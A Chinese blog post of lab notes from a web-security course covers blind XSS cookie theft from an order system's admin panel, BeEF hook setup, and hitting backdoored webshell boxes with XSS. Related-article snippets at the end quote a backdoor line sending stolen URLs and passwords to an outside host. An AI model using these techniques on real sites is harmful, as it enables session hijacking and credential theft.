2021/12/06 XSS跨站之订单和shell箱子反杀记,beef

已于 2022-01-24 10:01:58 修改
阅读量359 收藏 1
点赞数
文章标签: xss 前端
于 2021-12-07 14:05:27 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44532761/article/details/121744243
版权

小迪

https://www.bilibili.com/video/BV1JZ4y1c7ro?p=25

涉及资源

https://github.com/tennc/webshell
https://www.postman.com/downloads/

在这里插入图片描述

订单系统XSS盲打-平台

安装网站
有了前人的教训,先删除了源码install的/install.lock
在这里插入图片描述
数据库报错
在这里插入图片描述
在这里插入图片描述
年🐎,后台进不去,一看验证码加载不出来,而且路径也不对,把lib放进admin试试
在这里插入图片描述
ahhhhh鸡汤…不玩了,打开还是no found,这里先记录小迪录屏
在这里插入图片描述
在这里插入图片描述
xss平台
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
提交
在这里插入图片描述
模拟管理员查看订单
在这里插入图片描述
刷新项目
在这里插入图片描述
得到网站cookie
在这里插入图片描述
使用postman修改cookie
这里先复制的本地cookie没用平台
在这里插入图片描述

在这里插入图片描述
send,登录后台
在这里插入图片描述
document.cookie

webshell箱子反杀

网上很多工具大马都有后门,把记录上传到他们那获利,自己成为工具人。

参考链接 https://blog.csdn.net/xf555er/article/details/105151100

使用的时候可以抓包看是否向不明地址发数据包,如果它发送的是账户密码之类,我们可以构造xss脚本反杀

beef工具使用

这里发现下载太慢了
把之前阿里的换中科的源

vim /etc/apt/sources.list打开apt源

deb http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib
deb-src http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib

更新源:apt-get update

在这里插入图片描述
下载beef

sudo apt-get install beef-xss

修改默认密码,记得重启电脑或者杀死beef进程才能生效。
在这里插入图片描述

浏览器访问
在这里插入图片描述
局域网搭建的,主机访问
在这里插入图片描述
在这里插入图片描述
插入到留言板测试
在这里插入图片描述
代码插进去去了,但是beef那边没有反应
在这里插入图片描述
hook.js没响应
在这里插入图片描述
仔细一看歪日,ip地址左右的是啥被编码了,好家伙把括号删掉就行了

在这里插入代码片

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
测试以下跳转网页功能
在这里插入图片描述
点击execute,目标网站自动跳转了
在这里插入图片描述
**cookie,session **
如果对方网站 采取session验证登录,那么光知道cookie不行
如果cookie中存在phpsessid那么必须要有phpsessid才行。

绕过session思路
1.phpinfo 中的HTTP_COOKIE(网站的根目录)
2.通过xss平台获取网站源码

「已注销」
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
第26天:WEB漏洞-XSS跨站订单Shell箱子反杀1
08-03
WEB 漏洞-XSS 跨站订单Shell 箱子反杀#XSS 平台及工具使用#XSS 经典应用案例测试#Session 与 Cookie 获取问题docum
小迪安全学习笔--第26天:web漏洞-xss跨站订单shell箱子反杀
zr1213159840的博客
01-03 526
xss平台及工具使用 postman可以通过获取的cookie登录网站的后台 beef工具必须在linux中才可以使用。 xss经典应用案例测试 webshell后门中的后门 箱子返回的代码中添加后门,然后获取到箱子的cookie后台 session与cookie获取问题 document.cookie等 代码中通过这个函数来获取cookie 配合读取phpinfo等源码信息等 案例演示 某营销订单系统化xss盲打_平台 某shell箱子系统xss盲打_工具 其他参考应用案例-后台权限维持 工具http/.
WEB漏洞-XSS跨站订单Shell箱子反杀
xhscxj的博客
01-23 476
shell箱子 很多人在网上发布大马,他们在大马中写入了后门。当你成功把有后门的大马上传到目标网站上时,大马就会把该网站的url以及密码发送给在大马留过后门的人。 $_SERVER['HTTP_HOST']//获取当前的url $_SERVER['PHP_SELF']//获取当前访问的文件路径 例子:(留后门的方式有很多,也有可能加密,这里只是举一个例子) 因为代码<script src='http://www.xxx.com/index.php?url=$url&pass=$passwor
Web漏洞-XSS跨站订单系统实操-WebShell箱子反杀
ran的博客
03-16 1112
到这里我们就可以联想到,我们可以随便从网上下载一些后门,经过自己的加工加入自己的后门代码之后再重新发布到各类社区或者论坛等平台,取一个牛逼点的名字,当别人利用你的后门来对其它网站进行入侵的时候,你就可以同步获取到他的入侵的网站的信息,就相当于别人在帮我们入侵。因为获取到的网站以及密码等信息会发送到箱子的后台,所以可以想到在密码或者URL等位置插入XSS代码,当管理员查看信封的时候,就可能会触发XSS代码,从而实现反杀。来到网站的后台可以看到刚刚提交的信息被成功上传到了网站的后台。
xss跨站订单shell箱子反杀
san3144393495的博客
05-24 908
弹窗1,这是刚刚写的跨站代码语句执行成功了,如果我们写一些可以盗取对方cookie的代码,获取到cookie之后再利用这个cookie去尝试登陆这个后台,可以得到后台的信息,同样后台里面如果说能够进行这个权限提升,我们说的文件上传,尝试文件上传操作拿到网站的webshell,这都是可以进行的后缀操作。这个是可以进行xss漏洞的测试,凡是有这种数据交互的地方,前端有一个数据的接受,后端是数据的显示,这个过程就符合漏洞产生的前提条件,将输入的数据进行个显示,不太推荐那个语句的原因,太明显了,重新访问一下。
PHP和XSS跨站攻击的防范
10-30
#### 一、XSS跨站攻击概述 XSS(Cross Site Scripting)跨站脚本攻击是一种常见的安全威胁,尤其在Web应用程序中非常普遍。它允许攻击者注入恶意脚本到看似可信的网站上。当其他用户浏览这些被污染的网页时,恶意...
XSS跨站脚本攻击课件
最新发布
11-24
XSS跨站脚本攻击】详解 XSS(Cross-Site Scripting)跨站脚本攻击是网络攻防领域中的常见威胁,攻击者利用这种技术向网页中注入恶意脚本,进而对用户的信息安全构成严重风险。由于浏览器通常无法区分合法与恶意...
xss跨站脚本攻击-运维安全详细笔
06-30
xss跨站脚本攻击知识点总结 xss跨站脚本攻击是一种常见的Web应用安全漏洞,攻击者可以通过在网站上注入恶意代码,盗取用户敏感信息,控制企业数据,非法转账,发送恶意邮件等。下面是xss跨站脚本攻击的知识点总结:...
第一节 XSS跨站脚本分类-01
09-15
XSS跨站脚本分类 XSS 跨站脚本攻击是一种常见的 Web 应用程序安全漏洞,攻击者可以通过在 Web 页面中插入恶意 Script 代码来攻击用户。为了防止 XSS 攻击,需要了解 XSS 的分类和特点。 XSS 漏洞介绍 XSS 跨站...
XSS跨站订单shell反杀
qq_50613938的博客
11-03 265
Webshell箱子:相信很多人都使用过asp或者php的大马,一般这些大马的代码都是加密过的,这就存在一些猫腻了,因为在这些加密过的代码中有着后门代码,这些后门会将你找到的shell发送到他的服务器,就相当于你给别人打工。 废话不多说,实战来演示一下webshell箱子: 1、首先我们搭建一下asp服务器来放置webshell箱子(后门) 2、然后进入我们的后门网页,默认账号密码都是admin 3、随意构造一个一句话木马,然后再一句话木马代码里插入javascript语句来制作后门(调用webshel
webshell箱子数据
11-12
webshell箱子数据,全部的密码都是1
第26天-WEB漏洞-XSS跨站订单Shell箱子反杀
MCTSOG的博客
03-11 1414
思维导图 xss漏洞存在的地方 留言板 评论区 订单系统 意见反馈等 #cookie session 用户凭据:通过凭据可以判断对方身份信息 cookie 存储本地 存活时间较长 小中型 session 会话 存储服务器 存活时间较短 大型 演示案例: 某营销订单系统 XSS 盲打_平台 前端订单界面 后端管理界面 演示这个案例的意图是:了解在什么位置利用xss,从而获取有用信息! 使用xss平台/工具 自己编写代码接收 某 Shell 箱子系统 XSS 盲打_工具 跨站
26 WEB漏洞-XSS跨站订单Shell箱子反杀
山兔的博客
09-18 338
如果对方是session验证,我们是有方法的,但是比较鸡肋,可以结合辅助文件来进行攻击,有个phpinfo的界面文件,在这个界面存在http_cookie,我们的思路就是让跨站漏洞去访问这个文件,然后对这串源代码进行读取,只需要找到http_cookie,把session的值给拿到就可以,但是这里有个鸡肋的地方,就是这个跨站漏洞能不能实现访问这个phpinfo地址,其实是可以的。我们可以采取盲打,对方有没有这个跨站漏洞,我们不知道,不管三七二十一就是乱插入,就是乱写,跨站语句这里搞一句,那里搞一句。
使用Beef劫持客户端浏览器并进一步使用Beef+msf拿客户端shell
MickeyMouse1928的博客
04-08 2万+
利用Beef劫持客户端浏览器   环境: 1.Kali(使用beef生成恶意代码,IP:192.168.114.140) 2.一台web服务器(留言板存在XSS跨站脚本漏洞,IP:192.168.114.204) 3. 客户端(用于访问web服务器,IP:192.168.114.130) 步骤: 1. Kali使用beef生成恶意代码 2. 将恶意代码写入192.168.114.2
beef +metasploit关联拿shell教程
Johnathan的博客
03-01 659
参考了网络很多大神文章,简单小结一下,仅供参考 手动关联 beef + msf 1,配置beef的vim /usr/share/beef-xss/config.yaml,修改此文件metasploit配置为 enable:true 2,配置vim /usr/share/beef-xss/...
php shell箱子,ShellWrap
weixin_33873956的博客
03-18 128
软件简介ShellWrap 可以让你在PHP代码里使用强大的 Linux/Unix 命令行工具示例代码:require_once'vendor/autoload.php';useMrRio\ShellWrapassh;//Listallfilesincurrentdirechosh::ls();//Checkoutabranchingitsh::git('check...
XSS(跨站脚本攻击)详解
热门推荐
谢公子的博客
09-08 7万+
目录 XSS的原理和分类 XSS的攻击载荷 XSS可以插在哪里? XSS漏洞的挖掘 XSS的攻击过程 XSS漏洞的危害 XSS漏洞的简单攻击测试 反射型XSS: 存储型XSS: DOM型XSSXSS的简单过滤和绕过 ​XSS的防御 反射型XSS的利用姿势 get型 post型 利用JS将用户信息发送给后台 XSS的原理和分类 跨站脚本攻击XSS(Cros...
webshell箱子系统的使用以及反后门
xf555er的博客
03-27 3025
Webshell箱子:相信很多人都使用过asp或者php的大马,一般这些大马的代码都是加密过的,这就存在一些猫腻了,因为在这些加密过的代码中有着后门代码,这些后门会将你找到的shell发送到他的服务器,就相当于你给别人打工。 废话不多说,实战来演示一下webshell箱子: 1、首先我们搭建一下asp服务器来放置webshell箱子(后门) 2、然后进入我们的后门网页,默认账号密码都是admin...
25.XSS跨站原理分类和攻击手法
mingyqf的博客
04-05 4057
XSS跨站原理分类和攻击手法 就是和html语言打交道 归纳很全的大佬文章 二十五:XSS跨站值原理分类及攻击手法 - 九~月 - 博客园 (cnblogs.com) 知识汇总 XSS 跨站漏洞 1. XSS简介 跨站脚本攻击是指恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。 攻击者利用XSS漏洞旁路掉访问控制——例如同源策略(same origin policy)。这种类型的漏洞由于被黑客用来编写危害性更大
PHP和Apache环境中部署xsslabs XSS跨站脚本攻击靶场教程
xsslabs是一个XSS跨站脚本攻击靶场工具,旨在帮助开发者和安全人员学习和检测XSS攻击。XSS攻击是一种常见的Web应用程序漏洞,攻击者可以通过inject恶意脚本来盗取用户cookie、劫持用户会话、修改页面内容等。 **...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值